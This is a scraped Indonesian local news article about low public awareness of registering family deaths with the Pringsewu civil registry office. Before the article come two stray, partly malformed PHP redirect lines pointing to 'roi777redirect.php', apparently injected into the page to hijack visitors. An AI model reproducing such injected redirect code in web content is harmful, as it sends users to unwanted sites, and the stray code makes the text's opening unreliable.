header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Masih Kurangnya Kesadaran Masyarakat Masalah Kematian -
Masih Kurangnya Kesadaran Masyarakat Masalah Kematian

TRANSLAMPUNG.COM, PRINGSEWU, Masih kurangnya masyarakat mendaftarkan keluarganya tentang masalah kematian ke dinas pendudukan dan catatan sipil, ungkap kepala dinas kependudukan dan catatan sipil Hasan basri, Minggu (1/7) di tempat.

Hasan basri mengatakan upaya pemerintah dalam memberikan pengarahan kepada masyarakat melalui kecamatan dan kelurahan tentang pentingnya mendaftarkan keluarganya yang telah meninggal.

Tambahnya, pemerintah melalui dinas kependudukan dan catatan sipil selalu berupaya untuk memantau agar data kemantian dengan data hidup tetap akurat.

“Dalam hal ini tentunya kami butuh dukungan dari segala pihak agar semua bisa berjalan dengan lancar,dan terciptanya data yang kongkrit,”Tuturnya.

“Di takutkan karena lupanya masyarakat dalam mendaftarkan keluarganya yang sudah mininggal ke dinas setempat, di dalam massa politik ini maka akan ada yang di untungkan sebelah pihak,”Tegasnya.(rez)

News Reporter